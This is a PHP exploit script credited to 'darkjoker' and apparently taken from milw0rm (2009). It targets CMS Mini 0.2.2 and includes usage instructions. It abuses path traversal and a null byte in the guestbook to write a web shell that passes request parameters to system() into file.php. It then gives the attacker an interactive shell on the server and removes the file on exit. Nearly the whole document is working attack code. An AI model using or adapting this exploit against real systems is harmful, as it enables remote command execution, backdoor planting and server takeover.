1 −−+++================================================================+++−−
2 −−+++====== CMS Mini <= 0.2.2 Remote Command Execution Exploit ======+++−−
3 −−+++================================================================+++−−
4
5 <?php
6
7 function usage ()
8 {
9
exit (
10
"\nCMS Mini <= 0.2.2 Remote Command Execution Exploit".
11
"\n[+] Author : darkjoker".
12
"\n[+] Site : http://darkjoker.net23.net".
13
"\n[+] Download: http://ovh.dl.sourceforge.net/sourceforge/cmsmini/cmsmini−0.2.2.tar.gz".
14
"\n[+] Usage : php xpl.php <hostname> <path>".
15
"\n[+] Ex. : php xpl.php localhost /CMSmini".
16
"\n\n");
17 }
18
19 if ($argc != 3)
20
usage;
21 $hostname = $argv [1];
22 $path = $argv [2];
23 $fp = fsockopen ($hostname, 80);
24 $post = "message=<? system (\$_GET [’cmd’]); die ();?>";
25 $request = "POST {$path}/view/index.php?op=guestbook&path=..&p=file.php%00 HTTP/1.1\r\n".
26
"Host: $hostname\r\n".
27
"Connection: Close\r\n".
28
"Content−Type: application/x−www−form−urlencoded\r\n".
29
"Content−Length: " . strlen ($post) . "\r\n\r\n".
30
$post;
31 fputs ($fp, $request);
32 fclose ($fp);
33 $stdin = fopen("php://stdin", "r");
34 while (1)
35 {
36
echo "$ ";
37
$cmd = str_replace (" ", "%20", trim (fgets ($stdin, 1024)));
38
if ($cmd == "exit")
39
{
40
file_get_contents ("http://{$hostname}{$path}/file.php?cmd=rm%20file.php");
41
break;
42
}
43
echo file_get_contents ("http://{$hostname}{$path}/file.php?cmd={$cmd}");
44
45 }
46 fclose ($stdin);
47 ?>
48
49 # milw0rm.com [2009−02−02]
Page 1/1
CMS Mini 0.2.2 Remote Command Execution Exploit
darkjoker
02/02/2009